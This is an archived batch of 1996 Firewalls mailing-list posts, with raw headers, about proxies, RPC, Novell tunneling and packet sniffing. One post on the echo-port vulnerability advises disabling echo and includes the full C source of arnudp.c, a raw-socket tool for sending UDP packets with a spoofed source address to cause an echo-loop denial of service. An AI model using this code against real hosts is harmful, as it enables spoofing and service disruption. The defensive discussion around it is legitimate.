Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My hind brain keeps telling my forebrain that somewhere it read that Windows 95 and Windows NT has been banned on some networks because of the problems they created when connecting to other operating systems. Could some kind soul e-mail me pointers to articles or postings on this subject, please? Sick Puppy, tCDE cDm From firewalls-owner Mon Feb 5 10:24:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA21628 for firewalls-outgoing; Mon, 5 Feb 1996 09:52:54 -0800 (PST) Received: from tiete.dcc.unicamp.br (dcc.unicamp.br [143.106.1.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA21611 for ; Mon, 5 Feb 1996 09:52:36 -0800 (PST) Received: from grande (grande.dcc.unicamp.br) by tiete.dcc.unicamp.br (4.1/SMI-4.1) id AA17786; Mon, 5 Feb 96 15:25:44 EDT Received: from negro by grande (SMI-8.6/SMI-SVR4) id PAA09189; Mon, 5 Feb 1996 15:25:31 -0200 Received: by negro (SMI-8.6/SMI-SVR4) id PAA14699; Mon, 5 Feb 1996 15:25:29 -0200 Date: Mon, 5 Feb 1996 15:25:29 -0200 From: Jose Roberto Menezes Monteiro Message-Id: <199602051725.PAA14699@negro> To: Firewalls@GreatCircle.COM Subject: IP kernel variable of Solaris X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does anybody know a reference in the net I could find information about the all the IP kernel variable of Solaris? TIA, From firewalls-owner Mon Feb 5 10:49:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA20513 for firewalls-outgoing; Mon, 5 Feb 1996 09:30:28 -0800 (PST) Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA20501 for ; Mon, 5 Feb 1996 09:30:23 -0800 (PST) Received: (from nobody@localhost) by tera.bctel.net (8.7.1/8.7.1) id JAA23984; Mon, 5 Feb 1996 09:29:24 -0800 (PST) X-Authentication-Warning: tera.bctel.net: nobody set sender to using -f Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma023982; Mon Feb 5 09:29:03 1996 Received: (from murrell@localhost) by mocha.bctel.net (8.7.1/8.7.1) id JAA04751; Mon, 5 Feb 1996 09:29:21 -0800 (PST) From: Brian Murrell Message-Id: <199602051729.JAA04751@mocha.bctel.net> Date: Mon, 5 Feb 1996 09:29:19 -0800 (PST) To: chris@cwi.net Cc: tferro@raptor.com, firewalls@GreatCircle.COM Subject: Re[2]: PC based sniffer In-Reply-To: X-Mailer: Ishmail-demo 1.2-960125-sol24 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Chris Eastman wrote: > tcpdump has options for sniffing ppp and/or slip streams. > Yeah right. The support is pretty crude. I've been extending the support for PPP as I find time. The real hard part is how do you actually get the data stream to use tcpdump on?? b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Mon Feb 5 10:49:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA23627 for firewalls-outgoing; Mon, 5 Feb 1996 10:32:27 -0800 (PST) Received: from tintagel.kesmai.com (tintagel-out.kesmai.com [199.95.72.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA23622 for ; Mon, 5 Feb 1996 10:32:23 -0800 (PST) Received: by tintagel.kesmai.com; id NAA02606; Mon, 5 Feb 1996 13:30:12 -0500 Received: from muddy.kesmai.com(199.95.75.19) by tintagel.kesmai.com via smap (g3.0.1) id sma002602; Mon, 5 Feb 96 13:30:02 -0500 Received: from sandy_bryant (kespc222.kesmai.com [199.95.75.222]) by muddy.kesmai.com (8.6.12/8.6.9) with SMTP id NAA27511; Mon, 5 Feb 1996 13:28:41 -0500 Date: Mon, 5 Feb 1996 13:28:41 -0500 Message-Id: <199602051828.NAA27511@muddy.kesmai.com> X-Sender: slb@muddy.kesmai.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Sick Puppy , firewalls@GreatCircle.COM From: sandy bryant Subject: Re: Need a few pointers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 12:40 PM 2/5/96 -0500, Sick Puppy wrote: >My hind brain keeps telling my forebrain that somewhere it read that >Windows 95 and Windows NT has been banned on some networks because of the >problems they created when connecting to other operating systems. Could >some kind soul e-mail me pointers to articles or postings on this subject, >please? > > Sick Puppy, tCDE > cDm > Maybe you're thinking of the problem Novell networks had with Windows 95? Since Windows 95 answers the Netware client GetNearestServer call with a packet claiming to be a Netware server, it can seriously confuse Netware clients if there is no other server on the LAN - the client will time out trying to log into the 95 machine (after all, it said it was a server...) and then fail. Even if there is a true server on the network, some clients will still get the 95 packet first. Don't know if this has been fixed yet. sandy bryant kesmai corp. sandy@kesmai.com From firewalls-owner Mon Feb 5 10:50:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA22712 for firewalls-outgoing; Mon, 5 Feb 1996 10:18:14 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA22675 for ; Mon, 5 Feb 1996 10:18:00 -0800 (PST) Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id NAA02783; Mon, 5 Feb 1996 13:16:14 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma002780; Mon Feb 5 13:16:02 1996 Date: Mon, 5 Feb 1996 13:16:02 -0500 (EST) From: Chris Woods To: gblolmxb@ibmmail.com cc: firewalls@GreatCircle.COM Subject: Re: WWW Proxy In-Reply-To: <199602051601.IAA15872@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 5 Feb 1996 gblolmxb@ibmmail.com wrote: > to add one more, for the firewalls 'inside' address> Does such a proxy > exist for WWW so that: > > 1. Users can use which-ever browers they like. > 2. The 'standard' winsock.dll, such as provided by FTP with their > Onnet product, can still be used. In many situations when an http proxy is required, I install CERN's httpd and run it in caching-proxy mode. I set it up to listen to a port, and simply point all http, ftp, and gopher requests at that port. Note that the clients in question must support the ability to specify a proxy host for these connections. In most cases, our clients are using Netscape for all outgoing Internet usage, including mail, http, ftp, and gopher (how often do we really see gopher servers these days? ). > If so, which comercial firewalls support this? I have this in place with TIS' fwtk. I simply don't use the http-gw that came with the fwtk, and use CERN's instead. Chris Woods Systems Administrator cjwoods@paladin.com Paladin Computing Solutions 617-273-4226 http://www.paladin.com/chris/ Want the government to control what you are allowed to read and see? "Why, NO!", you say? See http://www.eff.org/blueribbon.html From firewalls-owner Mon Feb 5 11:23:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA25004 for firewalls-outgoing; Mon, 5 Feb 1996 11:07:14 -0800 (PST) Received: from calima (CALIMA.CIAT.CGIAR.ORG [198.93.225.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA24991 for ; Mon, 5 Feb 1996 11:07:06 -0800 (PST) Received: by calima (Smail3.1.29.1 #1) id m0tjUNF-00034sC; Mon, 5 Feb 96 14:06 WDT Date: Mon, 5 Feb 1996 14:06:41 -0300 (WDT) From: Juan Carlos Machado X-Sender: juank@calima To: firewalls@greatcircle.com Subject: CISCO Access Server Configuration Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, We have an CISCO Access Server 2511 that provide Home Access to the Internet. I find that only the PPP conections are registred in the TACACS wtmp file. We want to do the same with the simple TELNET connections. Does anydody know how ? Thanks a lot for your help. PS: excuse my poor English. _________________________________________________________ ========================================================= Juan Carlos Machado Z. jmachado@ciat.cgiar.org j.machado@cgnet.com Network Support Voice Ph#: (57-2)4450-691 >>>>>>>>>>>>>>>>>>>>>>>>>> :) <<<<<<<<<<<<<<<<<<<<<<<<<<< CIAT (International Center for Tropical Agriculture) Cali - Valle - Colombia. Phone: 4450000 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ JK:= NOT(reflect(opinions' self,opinions' employer)); From firewalls-owner Mon Feb 5 11:25:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24325 for firewalls-outgoing; Mon, 5 Feb 1996 10:51:42 -0800 (PST) Received: from chrivb01.cch.com ([199.14.11.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24309 for ; Mon, 5 Feb 1996 10:51:33 -0800 (PST) Received: by chrivb01.cch.com id AA17969; Mon, 5 Feb 96 12:41:26 CST Received: from mailhub.cch.com(165.181.21.17) by chrivb01 via smap (V1.3mjr) id sma017961; Mon Feb 5 12:40:54 1996 Received: by notes.cch.com (IBM OS/2 SENDMAIL VERSION 1.3.14/1.0) id AA5369; Mon, 05 Feb 96 12:42:47 -0600 Message-Id: <9602051842.AA5369@notes.cch.com> Received: from Computax with "Lotus Notes Mail Gateway for SMTP" id 2672F3A00A9AC3D0862562C70065F6FF; Mon, 5 Feb 96 12:42:46 To: firewalls From: "Richard Giering Jr." Date: 5 Feb 96 12:39:39 Subject: RPC Across a firewall? Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I know the kind of reaction I'm libel to get but I said I'd check into it.... We have developers who are writing apps based upon RPC and demanding that RPC be opened on the firewall. The idea is to enable users with their own Internet provider to be able to access Internal applications using RPC/client-server apps. I have some concerns listed below. Can anyone think of anymore? 1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms 2) RPC and portmapper are hard if not impossible to proxy. 3) RPC is insecure 4) portmapper has many known security holes. My reaction has been "if they want to dialup, we'll setup internal modems" Is anyone aware of firewall products allow and protect RPC? Rick Giering, Firewall Ranger CCH Inc. From firewalls-owner Mon Feb 5 11:26:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24634 for firewalls-outgoing; Mon, 5 Feb 1996 10:58:51 -0800 (PST) Received: from ufrmsa1.Olivetti.za (ufrmsa1.Olivetti.za [160.124.2.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24598 for ; Mon, 5 Feb 1996 10:58:40 -0800 (PST) Received: from andy by ufrmsa1.Olivetti.za with uucp (Smail3.1.29.1 #3) id m0tjW6f-000IaRC; Mon, 5 Feb 96 20:57 GMT+0200 Date: Mon, 5 Feb 1996 20:52:09 +0200 (GMT+0200) From: Andrew Cameron To: Firewalls@GreatCircle.COM Subject: Re: Echo Vunerebility In-Reply-To: <199602050214.SAA19282@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I noticed someone mentioning the echo port. My advice is to disable the echo service completely. It is often used by hackers to hang a computer. Try sending a packet from port 7 your ip to port 7 your ip. The system will bounce the packet back and forth slowing the system drastically. A Hacker Program I have seen used to do this is called arnudp.c ---------------------------Cut Here--------------------------------------- /************************************************************************/ /* arnudp.c version 0.01 by Arny - cs6171@scitsc.wlv.ac.uk */ /* Sends a single udp datagram with the source/destination address/port */ /* set to whatever you want. Unfortunately Linux 1.2 and SunOS 4.1 */ /* don't seem to have the IP_HDRINCL option, so the source address will */ /* be set to the real address. It does however work ok on SunOS 5.4. */ /* Should compile fine with just an ANSI compiler (such as gcc) under */ /* Linux and SunOS 4.1, but with SunOS 5.4 you have to specify extra */ /* libraries on the command line: */ /* /usr/ucb/cc -o arnudp arnudp001.c -lsocket -lnsl */ /* I'll state the obvious - this needs to be run as root! Do not use */ /* this program unless you know what you are doing, as it is possible */ /* that you could confuse parts of your network / internet. */ /* (c) 1995 Arny - I accept no responsiblity for anything this does. */ /************************************************************************/ /* I used the source of traceroute as an example while writing this. */ /* Many thanks to Dan Egnor (egnor@ugcs.caltech.edu) and Rich Stevens */ /* for pointing me in the right direction. */ /************************************************************************/ #include #include #include #include #include #include #include #include #include #include #include struct sockaddr sa; main(int argc,char **argv) { int fd; int x=1; struct sockaddr_in *p; struct hostent *he; u_char gram[38]= { 0x45, 0x00, 0x00, 0x26, 0x12, 0x34, 0x00, 0x00, 0xFF, 0x11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x00, 0x12, 0x00, 0x00, '1','2','3','4','5','6','7','8','9','0' }; if(argc!=5) { fprintf(stderr,"usage: %s sourcename sourceport destinationname destinationport\n",*argv); exit(1); }; if((he=gethostbyname(argv[1]))==NULL) { fprintf(stderr,"can't resolve source hostname\n"); exit(1); }; bcopy(*(he->h_addr_list),(gram+12),4); if((he=gethostbyname(argv[3]))==NULL) { fprintf(stderr,"can't resolve destination hostname\n"); exit(1); }; bcopy(*(he->h_addr_list),(gram+16),4); *(u_short*)(gram+20)=htons((u_short)atoi(argv[2])); *(u_short*)(gram+22)=htons((u_short)atoi(argv[4])); p=(struct sockaddr_in*)&sa; p->sin_family=AF_INET; bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr)); if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1) { perror("socket"); exit(1); }; #ifdef IP_HDRINCL fprintf(stderr,"we have IP_HDRINCL :-)\n\n"); if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0) { perror("setsockopt IP_HDRINCL"); exit(1); }; #else fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n"); #endif if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1) { perror("sendto"); exit(1); }; printf("datagram sent without error:"); for(x=0;x<(sizeof(gram)/sizeof(u_char));x++) { if(!(x%4)) putchar('\n'); printf("%02x",gram[x]); }; putchar('\n'); } ---------------------------------------------------------------------------- From firewalls-owner Mon Feb 5 11:38:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA25681 for firewalls-outgoing; Mon, 5 Feb 1996 11:28:13 -0800 (PST) Received: from gateway.damark.com (GATEWAY.DAMARK.COM [204.17.145.230]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA25676 for ; Mon, 5 Feb 1996 11:28:08 -0800 (PST) Received: by gateway.damark.com; id NAA16611; Mon, 5 Feb 1996 13:27:14 -0600 Received: from unknown(172.31.254.231) by gateway.damark.com via smap (g3.0.1) id sme016605; Mon, 5 Feb 96 13:26:58 -0600 Received: by damark.com (5.65/1.2-eef) id AA07581; Mon, 5 Feb 96 13:25:50 -0600 Message-Id: <9602051925.AA07581@damark.com> From: "william.wells" To: FIREWALLS Subject: Re: SSL and S-HTTP Proxy Status (as of 11 January 1996) Date: Mon, 05 Feb 96 13:26:00 CST Sender: firewalls-owner@GreatCircle.COM Precedence: bulk (Sorry for not crediting the original authors below- the multiple nested mail replies got confused by the time they got to me) -- Writer 1 said: So, I sympathize with the sentiment that TIS should either put some effort into maintaining fwtk, or release it so that a net-fwtk could be maintained by the user community. Wait a minute -- are you asking TIS to keep spending money to keep giving you free firewalls? -- Writer 2 said: No I don't think that is what he is asking. I think that David was saying that if TIS isn't planning on doing anything further with the toolkit then why don't they release the code into the public domain or copy-left and let the community support it - after all it was (at least partly) developed under a DARPA contract at TAX PAYERS expense and should therefore belong to the TAX PAYERS and not TIS. -- I say: I'm not associated with TIS but I'd assume that the versions of fwtk that fall under the DARPA contract are relatively old and you probably don't them. I'd assume that any version or update made after the contract is under their control. Personally, I don't find many companies giving away updated source, especially when they have a 'for sale' product. William Wells Manager, Technical Support Damark International, Inc william.wells@damark.com From firewalls-owner Mon Feb 5 12:00:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26046 for firewalls-outgoing; Mon, 5 Feb 1996 11:46:49 -0800 (PST) Received: from syr.edu (syr.EDU [128.230.1.49]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26041 for ; Mon, 5 Feb 1996 11:46:44 -0800 (PST) Received: from syru4-109.syr.EDU by syr.edu (8.6.9/CNS) id OAA11093; Mon, 5 Feb 1996 14:46:21 -0500 Message-ID: <3116889F.5FCF@syr.edu> Date: Mon, 05 Feb 1996 14:45:51 -0800 From: Peter Morrissey Organization: Syracuse University X-Mailer: Mozilla 2.0b6b (Win16; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Novell inside IP Port? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there known TCP/UDP port(s) that support the tunneling of Novell insided IP? Someone recently set up such a tunnel and exposed all our Novell Servers to the Internet. I would like to prevent this from happening in the future. From firewalls-owner Mon Feb 5 13:15:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA00355 for firewalls-outgoing; Mon, 5 Feb 1996 12:50:17 -0800 (PST) Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA00348 for ; Mon, 5 Feb 1996 12:50:13 -0800 (PST) Received: from mail.wangfed.com (ns.wangfed.com [159.94.10.19]) by tuna.wang.com (8.6.12/8.6.12tf1) with SMTP id PAA07460 for ; Mon, 5 Feb 1996 15:49:22 -0500 Received: from [159.94.10.15] by mail.wangfed.com (1.37.109.4/A.09.00a) id AA13907; Mon, 5 Feb 96 15:39:08 -0600 Received: from [159.94.14.48] by hfsi (BULL 5.61++/B.O.S 02.01) id AA00556; Mon, 5 Feb 96 15:35:46 -0500 Date: Mon, 5 Feb 96 15:35:46 -0500 Message-Id: <9602052035.AA00556@hfsi> From: "KM" Reply-To: "KM" To: firewalls@GreatCircle.COM Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message <9602021404.AA18008@mordred.sware.com> Charles Watt writes: > Fine. You've got a nice system. Its use of TE-based MAC gives it some > definite competitive advantages over those systems that do not use MAC, > if integrated and administered properly. But TE provides no advantage > over a similar system based on MAC, such as the Harris firewall. There > you must compete based upon other features, such as better application > support or ease of administration. Or portability. Karen Goertzel Manager, International Programmes and Special Projects Secure Systems and Services Operation Wang Federal, Inc. 7900 Westpark Drive - MS 700 McLean, Virginia 22102-4299 TEL: 703-827 3914 FAX: 703-827 3161 goertzek@wangfed.com http://www.wangfed.com +------------------------------+ | It infuriates me to be wrong | | when I know I'm right. | | -- Moliere | +------------------------------+ From firewalls-owner Mon Feb 5 13:23:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA29377 for firewalls-outgoing; Mon, 5 Feb 1996 12:44:43 -0800 (PST) Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA29352 for ; Mon, 5 Feb 1996 12:44:36 -0800 (PST) Received: from mail.wangfed.com (ns.wangfed.com [159.94.10.19]) by tuna.wang.com (8.6.12/8.6.12tf1) with SMTP id PAA07281 for ; Mon, 5 Feb 1996 15:43:44 -0500 Received: from [159.94.10.15] by mail.wangfed.com (1.37.109.4/A.09.00a) id AA13869; Mon, 5 Feb 96 15:34:31 -0600 Received: from [159.94.14.48] by hfsi (BULL 5.61++/B.O.S 02.01) id AA00536; Mon, 5 Feb 96 15:31:09 -0500 Date: Mon, 5 Feb 96 15:31:09 -0500 Message-Id: <9602052031.AA00536@hfsi> From: "KM" Reply-To: "KM" To: firewalls@GreatCircle.COM Subject: Re: What are MLS and TE? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk More accurately (unless you're interested in the Sterling Software homepage), the URL for TSIG is: http://ftp.sterling.com/tsig/tsig.html In message <199602012215.QAA01008@sparc14.cs.uiuc.edu> writes: > > I also recommend looking at the TSIG pages at http://www.sterling.com Karen Goertzel Manager, International Programmes and Special Projects Secure Systems and Services Operation Wang Federal, Inc. 7900 Westpark Drive - MS 700 McLean, Virginia 22102-4299 TEL: 703-827 3914 FAX: 703-827 3161 goertzek@wangfed.com http://www.wangfed.com +------------------------------+ | It infuriates me to be wrong | | when I know I'm right. | | -- Moliere | +------------------------------+ From firewalls-owner Mon Feb 5 13:38:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA28898 for firewalls-outgoing; Mon, 5 Feb 1996 12:41:15 -0800 (PST) Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA28881 for ; Mon, 5 Feb 1996 12:41:09 -0800 (PST) Received: from mail.wangfed.com (ns.wangfed.com [159.94.10.19]) by tuna.wang.com (8.6.12/8.6.12tf1) with SMTP id PAA07234 for ; Mon, 5 Feb 1996 15:40:17 -0500 Received: from [159.94.10.15] by mail.wangfed.com (1.37.109.4/A.09.00a) id AA13856; Mon, 5 Feb 96 15:31:19 -0600 Received: from [159.94.14.48] by hfsi (BULL 5.61++/B.O.S 02.01) id AA00508; Mon, 5 Feb 96 15:27:57 -0500 Date: Mon, 5 Feb 96 15:27:57 -0500 Message-Id: <9602052027.AA00508@hfsi> From: "KM" Reply-To: "KM" To: firewalls@GreatCircle.COM Subject: Re: What are MLS and TE? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Given the original requestor is in Brazil, I would suggest taking a slightly less parochial view of the important Criteria and Guidances pertaining to MLS computing. It is quite likely that a Brazilian firm would be more interested in the Information Technology Security Evaluation Criteria (ITSEC), than in the TCSEC. Therefore, I also refer Ms. Ferreira Cunha to the following URL, which is the complete text of the ITSEC criteria: http://first.org/secpubs/itsec.txt Also at: http://www.raptor.com/library/itsec.txt You can also find the TCSEC (and related Rainbow books) online if you access a number of URLs. Between them, Raptor and SAIC have a number of the books covered, though by no means all. http://www.raptor.com/library/std001.txt http://www.raptor.com/library/std002.txt http://www.raptor.com/library/std003.txt http://www.raptor.com/library/std004.txt Also look at: http://mls.saic.com/papers/orange.txt http://mls.saic.com/papers/trusted_config.txt http://mls.saic.com/papers/trusted_dac.txt http://mls.saic.com/papers/trusted_manag.txt http://mls.saic.com/papers/trusted_dist.txt http://mls.saic.com/papers/trusted_audit.txt and http://www.cs.cmu.edu/afs/cs.cmu.edu/user/bsy/security/CSC-STD-001-83.txt For a good overview of MLS, please check out the Defense Information Systems Agency's URL on "MLS: The Basics": http://www.disa.mil/MLS/info/basics/sec0.html Karen Goertzel Manager, International Programmes and Special Projects Secure Systems and Services Operation Wang Federal, Inc. 7900 Westpark Drive - MS 700 McLean, Virginia 22102-4299 TEL: 703-827 3914 FAX: 703-827 3161 goertzek@wangfed.com http://www.wangfed.com +------------------------------+ | It infuriates me to be wrong | | when I know I'm right. | | -- Moliere | +------------------------------+ From firewalls-owner Mon Feb 5 13:54:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA03313 for firewalls-outgoing; Mon, 5 Feb 1996 13:33:37 -0800 (PST) Received: from access1.digex.net (access1.digex.net [205.197.245.192]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA03308 for ; Mon, 5 Feb 1996 13:33:32 -0800 (PST) Received: (from asec@localhost) by access1.digex.net (8.6.12/8.6.12) id QAA09330 ; for ; Mon, 5 Feb 1996 16:32:40 -0500 Date: Mon, 5 Feb 1996 16:32:39 -0500 (EST) From: Tom Cooper To: firewalls@greatcircle.com Subject: SQL*Net proxy? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone successfully configured a proxy for outbound/inbound SQL*Net transactions? In my observations, Unix to Unix server communications take place on a designated port, but PC to Unix communications switch port numbers after about 20-25 packets. The PC always sends to the designated port, but the Unix server changes to a different port. This makes filtering difficult. Thanks From firewalls-owner Mon Feb 5 14:26:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA02851 for firewalls-outgoing; Mon, 5 Feb 1996 13:20:34 -0800 (PST) Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA02846 for ; Mon, 5 Feb 1996 13:20:29 -0800 (PST) Received: from mail.wangfed.com (ns.wangfed.com [159.94.10.19]) by tuna.wang.com (8.6.12/8.6.12tf1) with SMTP id QAA08332; Mon, 5 Feb 1996 16:19:33 -0500 Received: from [159.94.10.15] by mail.wangfed.com (1.37.109.4/A.09.00a) id AA14192; Mon, 5 Feb 96 16:02:13 -0600 Received: from [159.94.14.48] by hfsi (BULL 5.61++/B.O.S 02.01) id AA00669; Mon, 5 Feb 96 15:58:31 -0500 Date: Mon, 5 Feb 96 15:58:31 -0500 Message-Id: <9602052058.AA00669@hfsi> From: "KM" Reply-To: "KM" To: Dan_Vukelich@qmgateib.mitre.org, firewalls@GreatCircle.COM Subject: Re: Survey Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message "Dan Vukelich" writes: > First, I'm looking for is an independent study of firewall products, with > columns such as "provides packet filtering," "supports IPX," etc. There are a few you should look up: NETWORK WORLD ran a survey of 13 different firewall products (January 29, 1996 issue). DATA COMMUNICATIONS ran a Lab Test of firewalls in its November 21, 1995 issue. Check out the DC URL: http://www.data.com/Lab_Tests/Firewalls.html In 1995, the Computer Security Institute published a Firewall Product Matrix (Computer Security Journal, Vol. XI, No. 1, 1995). CSI's phone number is 415-905 2626 if you want to order a back issue. INFOSECURITY NEWS ran its "Shopping for Firewalls" survey in 1995. Unfortunately, my copy is a reprint, which has no specific issue date on it. (Magazines that print and distribute these reprints should take heed; it would be extremely helpful if you'd include the date of the issue in which they were printed!) If anyone can help, please do. Karen Goertzel Manager, International Programmes and Special Projects Secure Systems and Services Operation Wang Federal, Inc. 7900 Westpark Drive - MS 700 McLean, Virginia 22102-4299 TEL: 703-827 3914 FAX: 703-827 3161 goertzek@wangfed.com http://www.wangfed.com +------------------------------+ | It infuriates me to be wrong | | when I know I'm right. | | -- Moliere | +------------------------------+ From firewalls-owner Mon Feb 5 14:27:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA02969 for firewalls-outgoing; Mon, 5 Feb 1996 13:22:50 -0800 (PST) Received: from tuna.wang.com (tuna.wang.com [150.124.136.4]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA02963 for ; Mon, 5 Feb 1996 13:22:45 -0800 (PST) Received: from mail.wangfed.com (ns.wangfed.com [159.94.10.19]) by tuna.wang.com (8.6.12/8.6.12tf1) with SMTP id QAA08431 for ; Mon, 5 Feb 1996 16:21:55 -0500 Received: from [159.94.10.15] by mail.wangfed.com (1.37.109.4/A.09.00a) id AA14297; Mon, 5 Feb 96 16:12:56 -0600 Received: from [159.94.14.48] by hfsi (BULL 5.61++/B.O.S 02.01) id AA00719; Mon, 5 Feb 96 16:09:34 -0500 Date: Mon, 5 Feb 96 16:09:34 -0500 Message-Id: <9602052109.AA00719@hfsi> From: "KM" Reply-To: "KM" To: firewalls@GreatCircle.COM Subject: Re: Need a few pointers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In message Sick Puppy writes: > My hind brain keeps telling my forebrain that somewhere it read that > Windows 95 and Windows NT has been banned on some networks because of the > problems they created when connecting to other operating systems. There are other operating systems? :) Karen Goertzel Manager, International Programmes and Special Projects Secure Systems and Services Operation Wang Federal, Inc. 7900 Westpark Drive - MS 700 McLean, Virginia 22102-4299 TEL: 703-827 3914 FAX: 703-827 3161 goertzek@wangfed.com http://www.wangfed.com +------------------------------+ | It infuriates me to be wrong | | when I know I'm right. | | -- Moliere | +------------------------------+ From firewalls-owner Mon Feb 5 14:30:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04040 for firewalls-outgoing; Mon, 5 Feb 1996 13:47:54 -0800 (PST) Received: from guardian.EnGarde.com (guardian.EnGarde.com [199.165.219.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA04035 for ; Mon, 5 Feb 1996 13:47:47 -0800 (PST) Received: (from mcn@localhost) by guardian.EnGarde.com (8.7.3/8.6.12) id PAA19135; Mon, 5 Feb 1996 15:44:39 -0600 (CST) Date: Mon, 5 Feb 1996 15:44:39 -0600 (CST) From: Mike Neuman Message-Id: <199602052144.PAA19135@guardian.EnGarde.com> To: chris@cwi.net Subject: Re: slip/ppp sniffing Reply-To: mcn@EnGarde.com Organization: En Garde Systems--St. Louis, MO Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk chris@cwi.net writes: >Supposedly lanl has finished up watcher, I was told it has plenty of >options for monitoring ppp/slip connections. Has watcher gone >commercial, or is there a PD version out there somewhere? Amazing how rumors spread. :-) To correct this particular one: 1) IP-Watcher is a commercial product 2) I was once (several years ago) employed by LANL. 3) There really aren't any options for monitoring slip or ppp connections. It can "only" monitor TCP/IP connections, not raw serial data. There is a public domain spin off called TTY-Watcher which monitors ttys on a single system. This could be extended to monitor PPP or SLIP connections to a single machine, but it doesn't currently do so. For information on IP-Watcher: http://www.engarde.com/software/ipwatcher I presented a technical paper on IP-Watcher at the Computer Security 